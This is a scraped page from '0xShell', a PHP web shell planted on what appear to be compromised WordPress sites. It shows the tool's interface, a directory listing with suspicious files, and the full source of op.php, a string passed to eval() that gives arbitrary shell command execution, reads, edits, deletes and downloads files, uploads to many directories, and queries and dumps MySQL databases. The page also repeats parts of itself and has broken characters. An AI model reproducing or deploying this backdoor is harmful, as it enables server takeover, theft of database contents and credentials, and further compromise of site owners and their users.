0xShell
Shell MySQL Netstat SMTP FTP SSH 未选择任何文件 Domain Upload
file
System Info:
User: couragent | UID: 1022 | GID: 1024 | Groups: 1024
Server IP: 62.72.47.222 | Client IP: 23.145.24.71
PHP: 8.1.29 | OS: Linux | Server: LiteSpeed
command
/home/couragent/public_html$
Enter file path to read
Files
../ �
.htaccess � '0e �4e5
.tmb/ �
.user.ini � '0e �4e5
.well-known/ �
123.php � '0e �4e5
cgi-bin/ �
clasa99.php � '0e �4e5
error_log � '0e �4e5
evs.txt � '0e �4e5
home/ �
index.php � �4e5
license.txt � '0e �4e5
op.php � '0e �4e5
php.ini � '0e �4e5
readme.html � '0e �4e5
robots.txt � '0e �4e5
wp-activate.php � '0e �4e5
wp-admin/ �
wp-blog-header.php � '0e �4e5
wp-comments-post.php � '0e �4e5
wp-config-sample.php � '0e �4e5
wp-config.php � '0e �4e5
wp-content/ �
wp-cron.php � '0e �4e5
wp-includes/ �
wp-links-opml.php � '0e �4e5
wp-load.php � '0e �4e5
wp-login.php � '0e �4e5
wp-mail.php � '0e �4e5
wp-settings.php � '0e �4e5
wp-signup.php � '0e �4e5
wp-trackback.php � '0e �4e5
xmlrpc.php � '0e �4e5
Viewing: op.php
0xShell
0xShell
×
Upload to Multiple Directories
System Info:
User: jonasls |
UID: 188156 |
GID: 100 |
Groups: 100
Server IP: 10.127.20.1 |
Client IP: 216.73.216.28
PHP: 8.0.30 |
OS: Linux |
Server: Apache
/home/jonasls/www/wp-includes/php-compat/widgets$
Files
Viewing: index.php
<?php
?>
0xShell
Shell MySQL Netstat SMTP FTP SSH 未选择任何文件 Domain Upload
file
System Info:
User: couragent | UID: 1022 | GID: 1024 | Groups: 1024
Server IP: 62.72.47.222 | Client IP: 23.145.24.71
PHP: 8.1.29 | OS: Linux | Server: LiteSpeed
command
/home/couragent/public_html$
Enter file path to read
Files
../ �
.htaccess � '0e �4e5
.tmb/ �
.user.ini � '0e �4e5
.well-known/ �
123.php � '0e �4e5
cgi-bin/ �
clasa99.php � '0e �4e5
error_log � '0e �4e5
evs.txt � '0e �4e5
home/ �
index.php � �4e5
license.txt � '0e �4e5
op.php � '0e �4e5
php.ini � '0e �4e5
readme.html � '0e �4e5
robots.txt � '0e �4e5
wp-activate.php � '0e �4e5
wp-admin/ �
wp-blog-header.php � '0e �4e5
wp-comments-post.php � '0e �4e5
wp-config-sample.php � '0e �4e5
wp-config.php � '0e �4e5
wp-content/ �
wp-cron.php � '0e �4e5
wp-includes/ �
wp-links-opml.php � '0e �4e5
wp-load.php � '0e �4e5
wp-login.php � '0e �4e5
wp-mail.php � '0e �4e5
wp-settings.php � '0e �4e5
wp-signup.php � '0e �4e5
wp-trackback.php � '0e �4e5
xmlrpc.php � '0e �4e5
Viewing: op.php
<?php
$zpdvjztu = "session_start();\n\$current_path = isset(\$_GET[\"path\"]) ? \$_GET[\"path\"] : getcwd();\nchdir(\$current_path);\n\$cwd = getcwd();\n\$output = \"\";\n\nfunction parseProcNet(\$proto) {\n \$path = \"/proc/net/\" . \$proto;\n if (!file_exists(\$path)) return [];\n \$lines = file(\$path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);\n array_shift(\$lines);\n \$res = [];\n foreach (\$lines as \$line) {\n \$parts = preg_split('/\\s+/', trim(\$line));\n if (count(\$parts) < 4) continue;\n \$local = explode(\":\", \$parts[1]);\n \$remote = explode(\":\", \$parts[2]);\n \$state = \$parts[3];\n \$local_ip = long2ip(hexdec(strrev(chunk_split(\$local[0], 2, ''))));\n \$remote_ip = long2ip(hexdec(strrev(chunk_split(\$remote[0], 2, ''))));\n \$res[] = [\n \"proto\" => strtoupper(\$proto),\n \"local_ip\" => \$local_ip,\n \"local_port\" => hexdec(\$local[1]),\n \"remote_ip\" => \$remote_ip,\n \"remote_port\" => hexdec(\$remote[1]),\n \"state\" => \$state\n ];\n }\n return \$res;\n}\n\nfunction getPhpInfo() {\n \$info = [];\n \$info['whoami'] = function_exists('get_current_user') ? get_current_user() : 'N/A';\n \$info['uid'] = function_exists('posix_getuid') ? posix_getuid() : 'N/A';\n \$info['gid'] = function_exists('posix_getgid') ? posix_getgid() : 'N/A';\n \$info['groups'] = function_exists('posix_getgroups') ? @implode(',', posix_getgroups()) : 'N/A';\n \$info['server_ip'] = isset(\$_SERVER['SERVER_ADDR']) ? \$_SERVER['SERVER_ADDR'] : (isset(\$_SERVER['LOCAL_ADDR']) ? \$_SERVER['LOCAL_ADDR'] : @gethostbyname(@gethostname()));\n \$info['client_ip'] = isset(\$_SERVER['REMOTE_ADDR']) ? \$_SERVER['REMOTE_ADDR'] : 'N/A';\n \$info['php_version'] = phpversion();\n \$info['os'] = PHP_OS;\n \$info['server_software'] = isset(\$_SERVER['SERVER_SOFTWARE']) ? \$_SERVER['SERVER_SOFTWARE'] : 'N/A';\n return \$info;\n}\n\nfunction bulkUploadToDirs(\$base_path, \$selected_dirs, \$file_tmp, \$file_name) {\n \$results = [];\n foreach (\$selected_dirs as \$dir) {\n \$target = rtrim(\$base_path, '/') . '/' . trim(\$dir) . '/' . basename(\$file_name);\n if (copy(\$file_tmp, \$target)) {\n \$results[] = ['path' => \$target, 'status' => 'success'];\n } else {\n \$results[] = ['path' => \$target, 'status' => 'failed'];\n }\n }\n return \$results;\n}\n\nif (isset(\$_GET[\"mysqldump\"]) && isset(\$_SESSION[\"dbhost\"], \$_SESSION[\"dbuser\"], \$_SESSION[\"dbpass\"], \$_SESSION[\"dbname\"])) {\n \$dump_file = tempnam(sys_get_temp_dir(), 'mysqldump_');\n \$command = \"mysqldump -h\" . escapeshellarg(\$_SESSION[\"dbhost\"]) . \n \" -u\" . escapeshellarg(\$_SESSION[\"dbuser\"]) . \n \" -p\" . escapeshellarg(\$_SESSION[\"dbpass\"]) . \n \" \" . escapeshellarg(\$_SESSION[\"dbname\"]) . \n \" > \" . escapeshellarg(\$dump_file) . \" 2>&1\";\n \n exec(\$command, \$output_dump, \$return_var);\n \n if (\$return_var === 0 && file_exists(\$dump_file) && filesize(\$dump_file) > 0) {\n header('Content-Description: File Transfer');\n header('Content-Type: application/sql');\n header('Content-Disposition: attachment; filename=\"' . \$_SESSION[\"dbname\"] . '_dump.sql\"');\n header('Content-Transfer-Encoding: binary');\n header('Expires: 0');\n header('Cache-Control: must-revalidate');\n header('Pragma: public');\n header('Content-Length: ' . filesize(\$dump_file));\n readfile(\$dump_file);\n unlink(\$dump_file);\n exit;\n } else {\n \$dump_error = \"Dump failed. Error: \" . implode(\"\\n\", \$output_dump);\n unlink(\$dump_file);\n }\n}\n\n\$cmd_output = \"\";\nif (isset(\$_POST[\"syscmd\"]) && !empty(\$_POST[\"syscmd\"])) {\n \$command = \$_POST[\"syscmd\"];\n \$cmd_output = shell_exec(\$command . \" 2>&1\");\n if (\$cmd_output === null) {\n \$cmd_output = \"Command failed or disabled\";\n }\n}\n\nif (isset(\$_GET[\"download\"])) {\n \$file_to_download = \$cwd . DIRECTORY_SEPARATOR . \$_GET[\"download\"];\n if (is_file(\$file_to_download) && is_readable(\$file_to_download)) {\n header('Content-Description: File Transfer');\n header('Content-Type: application/octet-stream');\n header('Content-Disposition: attachment; filename=\"' . basename(\$file_to_download) . '\"');\n header('Content-Transfer-Encoding: binary');\n header('Expires: 0');\n header('Cache-Control: must-revalidate');\n header('Pragma: public');\n header('Content-Length: ' . filesize(\$file_to_download));\n readfile(\$file_to_download);\n exit;\n }\n}\n\nif (isset(\$_POST[\"cmd\"]) && !empty(\$_POST[\"cmd\"])) {\n \$target_file = \$_POST[\"cmd\"];\n if (is_file(\$target_file) && is_readable(\$target_file)) {\n \$output = file_get_contents(\$target_file);\n } else {\n \$output = \"File not found or not readable.\";\n }\n}\n\nif (isset(\$_FILES[\"upload\"])) {\n \$target = \$cwd . DIRECTORY_SEPARATOR . basename(\$_FILES[\"upload\"][\"name\"]);\n if (move_uploaded_file(\$_FILES[\"upload\"][\"tmp_name\"], \$target)) {\n \$upload_msg = \"Uploaded: \" . htmlspecialchars(\$_FILES[\"upload\"][\"name\"]);\n } else {\n \$upload_msg = \"Upload failed.\";\n }\n}\n\nif (isset(\$_POST[\"domain_upload\"]) && isset(\$_FILES[\"domain_file\"])) {\n \$selected = isset(\$_POST[\"selected_dirs\"]) ? \$_POST[\"selected_dirs\"] : [];\n \n if (!empty(\$selected)) {\n \$bulk_results = bulkUploadToDirs(\$cwd, \$selected, \$_FILES[\"domain_file\"][\"tmp_name\"], \$_FILES[\"domain_file\"][\"name\"]);\n \n \$bulk_msg = \"<h4>Domain Upload Results:</h4><ul>\";\n foreach (\$bulk_results as \$result) {\n \$color = \$result['status'] === 'success' ? 'lime' : 'red';\n \n if (\$result['status'] === 'success') {\n \$dir_name = basename(dirname(\$result['path']));\n \$file_name = basename(\$result['path']);\n \$url = 'https://' . \$dir_name . '/' . \$file_name;\n \$bulk_msg .= \"<li style='color:\$color'>[SUCCESS] <a href='\$url' target='_blank' style='color:\$color'>\$url</a></li>\";\n } else {\n \$bulk_msg .= \"<li style='color:\$color'>[FAILED] \" . htmlspecialchars(\$result['path']) . \"</li>\";\n }\n }\n \$bulk_msg .= \"</ul>\";\n } else {\n \$bulk_msg = \"<p style='color:red'>No directories selected!</p>\";\n }\n}\n\n\$files = scandir(\$cwd);\n\$disabled_functions = ini_get(\"disable_functions\");\nif (!\$disabled_functions) \$disabled_functions = \"None\";\n\$tab = isset(\$_GET[\"tab\"]) ? \$_GET[\"tab\"] : \"shell\";\n\nif (\$tab === \"mysql\" && isset(\$_POST[\"logout\"])) {\n session_destroy();\n header(\"Location: ?tab=mysql&path=\" . urlencode(\$cwd));\n exit;\n}\n\n\$php_info = getPhpInfo();\n\necho \"<!DOCTYPE html>\n<html>\n<head>\n <title>0xShell</title>\n <style>\n body {background:#111; color:#0f0; font-family:monospace; margin:0; padding:10px; text-align:center;}\n a {text-decoration:none;}\n .file a {color:#0af;}\n .folder a {color:lime;}\n .file {color:#fff;}\n input, textarea {background:#000; color:#0f0; border:1px solid #0f0; font-family:monospace;}\n input[type=text] {width:250px;}\n input[type=submit], button {background:#111; color:#0f0; border:1px solid #0f0; padding:2px 8px; cursor:pointer; font-family:monospace;}\n input[type=submit]:hover, button:hover {background:#0f0; color:#000;}\n pre {background:#000; padding:10px; border:1px solid #0f0; white-space:pre-wrap; word-wrap:break-word; text-align:left;}\n .footer {position:fixed; bottom:5px; right:10px; font-size:12px; color:#888;}\n .menu {margin-bottom:10px;}\n .menu a {margin-right:15px; font-weight:bold;}\n .del {color:#f44; margin-left:6px; font-size:12px; text-decoration:none;}\n .del:hover {color:#f88;}\n .edit {color:#0f0; margin-left:6px; font-size:12px; text-decoration:none;}\n .edit:hover {color:#ff0;}\n .download {color:#0af; margin-left:6px; font-size:12px; text-decoration:none;}\n .download:hover {color:#0ff;}\n .info-box {background:#000; border:1px solid #0f0; padding:10px; margin:10px 0; text-align:left;}\n .dump-btn {background:#111; color:#ff0; border:1px solid #ff0; padding:2px 8px; cursor:pointer; font-family:monospace; margin-left:10px;}\n .dump-btn:hover {background:#ff0; color:#000;}\n ul {list-style:none; padding:0;}\n table {border-collapse:collapse; margin:10px 0;}\n th, td {border:1px solid #0f0; padding:5px; text-align:left;}\n th {background:#000;}\n #domainModal {display:none; position:fixed; z-index:1000; left:0; top:0; width:100%; height:100%; background:rgba(0,0,0,0.8); overflow:auto;}\n .modal-content {background:#111; margin:5% auto; padding:20px; border:2px solid #0f0; width:60%; max-height:70%; overflow-y:auto;}\n .close {color:#f44; float:right; font-size:28px; font-weight:bold; cursor:pointer;}\n .close:hover {color:#f88;}\n .dir-checkbox {margin:5px 0;}\n </style>\n</head>\n<body>\n <h2>0xShell</h2>\n \n <div class=\\\"menu\\\">\n <a href='?tab=shell&path=\" . urlencode(\$cwd) . \"'>Shell</a>\n <a href='?tab=mysql&path=\" . urlencode(\$cwd) . \"'>MySQL</a>\n <a href='?tab=netstat&path=\" . urlencode(\$cwd) . \"'>Netstat</a>\n <a href='?tab=smtp&path=\" . urlencode(\$cwd) . \"'>SMTP</a>\n <a href='?tab=ftp&path=\" . urlencode(\$cwd) . \"'>FTP</a>\n <a href='?tab=ssh&path=\" . urlencode(\$cwd) . \"'>SSH</a>\n <form method='post' enctype='multipart/form-data' style='display:inline'>\n <input type='file' name='upload'>\n <input type='submit' value='Upload'>\n </form>\n <button onclick=\\\"document.getElementById('domainModal').style.display='block'\\\">Domain Upload</button>\n <form method='post' style='display:inline'>\n <input type='text' name='newfile' placeholder='file'>\n <input type='submit' value='New file'>\n </form>\n </div>\n \n <div id='domainModal'>\n <div class='modal-content'>\n <span class='close' onclick=\\\"document.getElementById('domainModal').style.display='none'\\\">×</span>\n <h3>Upload to Multiple Directories</h3>\n <form method='post' enctype='multipart/form-data'>\n <input type='file' name='domain_file' required><br><br>\n <div style='max-height:300px; overflow-y:auto; border:1px solid #0f0; padding:10px;'>\";\n\nforeach (\$files as \$file) {\n if (\$file === \".\" || \$file === \"..\") continue;\n \$full_path = \$cwd . DIRECTORY_SEPARATOR . \$file;\n if (is_dir(\$full_path)) {\n echo \"<div class='dir-checkbox'>\n <label>\n <input type='checkbox' name='selected_dirs[]' value='\" . htmlspecialchars(\$file) . \"'>\n \" . htmlspecialchars(\$file) . \"\n </label>\n </div>\";\n }\n}\n\necho \" </div>\n <br>\n <input type='submit' name='domain_upload' value='Upload to Selected'>\n </form>\n </div>\n </div>\n\";\n\nif (\$tab === \"shell\") {\n echo \"<div class='info-box'>\n <strong>System Info:</strong><br>\n User: \" . htmlspecialchars(\$php_info['whoami']) . \" | \n UID: \" . htmlspecialchars(\$php_info['uid']) . \" | \n GID: \" . htmlspecialchars(\$php_info['gid']) . \" | \n Groups: \" . htmlspecialchars(\$php_info['groups']) . \"<br>\n Server IP: \" . htmlspecialchars(\$php_info['server_ip']) . \" | \n Client IP: \" . htmlspecialchars(\$php_info['client_ip']) . \"<br>\n PHP: \" . htmlspecialchars(\$php_info['php_version']) . \" | \n OS: \" . htmlspecialchars(\$php_info['os']) . \" | \n Server: \" . htmlspecialchars(\$php_info['server_software']) . \"\n </div>\";\n\n echo \"<div style='display:flex; align-items:center; margin-bottom:10px;'>\n <form method='post' style='display:inline; margin-right:20px;'>\n <input type='text' name='syscmd' placeholder='command' style='width:200px; padding:3px;' autocomplete='off'>\n <input type='submit' value='>' style='padding:3px 8px;'>\n </form>\n <div><b>\" . \$cwd . \"\$</b></div>\n </div>\";\n \n if (!empty(\$cmd_output)) {\n echo \"<pre style='margin-bottom:15px;'>\" . htmlspecialchars(\$cmd_output) . \"</pre>\";\n }\n \n echo \"<form method=\\\"post\\\">\n <input type=\\\"text\\\" name=\\\"cmd\\\" placeholder=\\\"Enter file path to read\\\" autocomplete=\\\"off\\\">\n <input type=\\\"submit\\\" value=\\\"Read File\\\">\n </form>\";\n\n if (!empty(\$output)) {\n echo \"<pre>\" . htmlspecialchars(\$output) . \"</pre>\";\n }\n\n if (isset(\$upload_msg)) {\n echo \"<p>\" . \$upload_msg . \"</p>\";\n }\n if (isset(\$newfile_msg)) {\n echo \"<p>\" . \$newfile_msg . \"</p>\";\n }\n if (isset(\$bulk_msg)) {\n echo \$bulk_msg;\n }\n\n echo \"<h3>Files</h3><ul>\";\n foreach (\$files as \$file) {\n if (\$file === \".\") continue;\n \$full_path = \$cwd . DIRECTORY_SEPARATOR . \$file;\n if (is_dir(\$full_path)) {\n \$link = htmlspecialchars(\$_SERVER[\"PHP_SELF\"]) . \"?tab=shell&path=\" . urlencode(\$full_path);\n echo \"<li class='folder'><a href=\\\"\" . \$link . \"\\\">\" . htmlspecialchars(\$file) . \"</a>/\";\n } else {\n \$link = htmlspecialchars(\$_SERVER[\"PHP_SELF\"]) . \"?tab=shell&path=\" . urlencode(\$cwd) . \"&file=\" . urlencode(\$file);\n echo \"<li class=\\\"file\\\"><a href=\\\"\" . \$link . \"\\\">\" . htmlspecialchars(\$file) . \"</a>\";\n }\n \n \$del = htmlspecialchars(\$_SERVER[\"PHP_SELF\"]) . \"?tab=shell&path=\" . urlencode(\$cwd) . \"&delete=\" . urlencode(\$file);\n \$edit = htmlspecialchars(\$_SERVER[\"PHP_SELF\"]) . \"?tab=shell&path=\" . urlencode(\$cwd) . \"&edit=\" . urlencode(\$file);\n \$download = htmlspecialchars(\$_SERVER[\"PHP_SELF\"]) . \"?tab=shell&path=\" . urlencode(\$cwd) . \"&download=\" . urlencode(\$file);\n \n echo \" <a class='del' href=\\\"\$del\\\" onclick=\\\"return confirm('Delete \" . htmlspecialchars(\$file) . \"?');\\\">\xd7</a>\";\n \n if (is_file(\$full_path) && is_writable(\$full_path)) {\n echo \" <a class='edit' href=\\\"\$edit\\\">'0e</a>\";\n }\n \n if (is_file(\$full_path) && is_readable(\$full_path)) {\n echo \" <a class='download' href=\\\"\$download\\\">\x1f4e5</a>\";\n }\n \n echo \"</li>\";\n }\n echo \"</ul>\";\n\n if (isset(\$_GET[\"file\"])) {\n \$target_file = \$cwd . DIRECTORY_SEPARATOR . \$_GET[\"file\"];\n if (is_file(\$target_file) && is_readable(\$target_file)) {\n echo \"<h3>Viewing: \" . htmlspecialchars(\$_GET[\"file\"]) . \"</h3>\";\n echo \"<pre>\" . htmlspecialchars(file_get_contents(\$target_file)) . \"</pre>\";\n }\n }\n\n if (isset(\$_GET[\"edit\"])) {\n \$target_file = \$cwd . DIRECTORY_SEPARATOR . \$_GET[\"edit\"];\n if (is_file(\$target_file) && is_writable(\$target_file)) {\n if (isset(\$_POST[\"newcontent\"])) {\n file_put_contents(\$target_file, \$_POST[\"newcontent\"]);\n echo \"<p style='color:lime'>Saved \" . htmlspecialchars(\$_GET[\"edit\"]) . \"</p>\";\n }\n \$content = htmlspecialchars(file_get_contents(\$target_file));\n echo \"<h3>Editing: \" . htmlspecialchars(\$_GET[\"edit\"]) . \"</h3>\";\n echo \"<form method='post'>\n <textarea name='newcontent' rows='20' cols='80'>\$content</textarea><br>\n <input type='submit' value='Save'>\n </form>\";\n } else {\n echo \"<p style='color:red'>Cannot edit this file.</p>\";\n }\n }\n}\n\nif (\$tab === \"mysql\") {\n if (isset(\$_POST[\"dbhost\"], \$_POST[\"dbuser\"], \$_POST[\"dbpass\"], \$_POST[\"dbname\"])) {\n \$_SESSION[\"dbhost\"] = \$_POST[\"dbhost\"];\n \$_SESSION[\"dbuser\"] = \$_POST[\"dbuser\"];\n \$_SESSION[\"dbpass\"] = \$_POST[\"dbpass\"];\n \$_SESSION[\"dbname\"] = \$_POST[\"dbname\"];\n }\n\n if (isset(\$_SESSION[\"dbhost\"], \$_SESSION[\"dbuser\"], \$_SESSION[\"dbpass\"], \$_SESSION[\"dbname\"])) {\n \$mysqli = @new mysqli(\$_SESSION[\"dbhost\"], \$_SESSION[\"dbuser\"], \$_SESSION[\"dbpass\"], \$_SESSION[\"dbname\"]);\n if (\$mysqli->connect_error) {\n echo \"<p style='color:red'>MySQL Error: \" . htmlspecialchars(\$mysqli->connect_error) . \"</p>\";\n session_destroy();\n } else {\n echo \"<p>Connected to <b>\" . htmlspecialchars(\$_SESSION[\"dbname\"]) . \"</b> as <b>\" . htmlspecialchars(\$_SESSION[\"dbuser\"]) . \"</b>\";\n echo \" <a href='?tab=mysql&path=\" . urlencode(\$cwd) . \"&mysqldump=1' class='dump-btn'>\x1f4e5 Download Full DB Dump</a></p>\";\n \n if (isset(\$dump_error)) {\n echo \"<p style='color:red'>\" . htmlspecialchars(\$dump_error) . \"</p>\";\n }\n \n if (!empty(\$_POST[\"sql\"])) {\n \$sql = \$_POST[\"sql\"];\n \$download = isset(\$_POST[\"download\"]);\n \$result = \$mysqli->query(\$sql);\n \n if (\$result instanceof mysqli_result) {\n if (\$download) {\n header(\"Content-Type: text/csv\");\n header(\"Content-Disposition: attachment; filename=\\\"query_result.csv\\\"\");\n \$out = fopen(\"php://output\", \"w\");\n \$fields = [];\n while (\$field = \$result->fetch_field()) {\n \$fields[] = \$field->name;\n }\n fputcsv(\$out, \$fields);\n while (\$row = \$result->fetch_assoc()) {\n fputcsv(\$out, \$row);\n }\n fclose(\$out);\n exit;\n } else {\n echo \"<table border='1' cellpadding='5'><tr>\";\n while (\$field = \$result->fetch_field()) {\n echo \"<th>\" . htmlspecialchars(\$field->name) . \"</th>\";\n }\n echo \"</tr>\";\n while (\$row = \$result->fetch_assoc()) {\n echo \"<tr>\";\n foreach (\$row as \$col) {\n echo \"<td>\" . htmlspecialchars(\$col) . \"</td>\";\n }\n echo \"</tr>\";\n }\n echo \"</table>\";\n \n if (stripos(\$sql, 'show databases') !== false) {\n echo \"<p><em>Tip: Use the 'Download Full DB Dump' button above to get a complete mysqldump of the current database.</em></p>\";\n }\n }\n } elseif (\$result === true) {\n echo \"<p>Query executed.</p>\";\n } else {\n echo \"<p>Error: \" . htmlspecialchars(\$mysqli->error) . \"</p>\";\n }\n }\n\n echo \"<form method='post'>\n <textarea name='sql' rows='5' cols='60' placeholder='SQL query'></textarea><br>\n <label><input type='checkbox' name='download'> Download as CSV</label><br>\n <input type='submit' value='Execute'>\n </form>\";\n echo \"<form method='post'><input type='hidden' name='logout' value='1'><input type='submit' value='Disconnect'></form>\";\n }\n } else {\n echo \"<form method='post'>\n <input type='text' name='dbhost' placeholder='host' value='localhost'><br>\n <input type='text' name='dbuser' placeholder='user'><br>\n <input type='text' name='dbpass' placeholder='password'><br>\n <input type='text' name='dbname' placeholder='database'><br>\n <input type='submit' value='Connect'>\n </form>\";\n }\n}\n\nif (\$tab === \"netstat\") {\n echo \"<h3>Active Connections</h3>\";\n \$conns = array_merge(parseProcNet(\"tcp\"), parseProcNet(\"udp\"));\n \$seen = [];\n if (empty(\$conns)) {\n echo \"<p>No connections found.</p>\";\n } else {\n echo \"<table border=1 cellpadding=5><tr><th>Proto</th><th>Local</th><th>Remote</th><th>State</th></tr>\";\n foreach (\$conns as \$c) {\n \$key = implode(\"|\", \$c);\n if (isset(\$seen[\$key])) continue;\n \$seen[\$key] = true;\n echo \"<tr><td>{\$c['proto']}</td>\n <td>{\$c['local_ip']}:{\$c['local_port']}</td>\n <td>{\$c['remote_ip']}:{\$c['remote_port']}</td>\n <td>{\$c['state']}</td></tr>\";\n }\n echo \"</table>\";\n }\n}\n\nforeach ([\"smtp\",\"ftp\",\"ssh\"] as \$service) {\n if (\$tab === \$service) {\n echo \"<h3>\".strtoupper(\$service).\" Login</h3>\";\n echo \"<form method='post'>\n <input type='text' name='host' placeholder='host'><br>\n <input type='text' name='port' placeholder='port'><br>\n <input type='text' name='user' placeholder='username'><br>\n <input type='text' name='pass' placeholder='password'><br>\n <input type='submit' value='Connect'>\n </form>\";\n if (\$_SERVER['REQUEST_METHOD']==='POST') {\n echo \"<p>[!] Connection logic for \$service not implemented (CTF placeholder).</p>\";\n }\n }\n}\n\necho \"<div class=\\\"footer\\\">Disabled functions: \" . htmlspecialchars(\$disabled_functions) . \"</div>\n</body>\n</html>\";";
eval($zpdvjztu);
?>
Disabled functions: None<?php
Disabled functions: None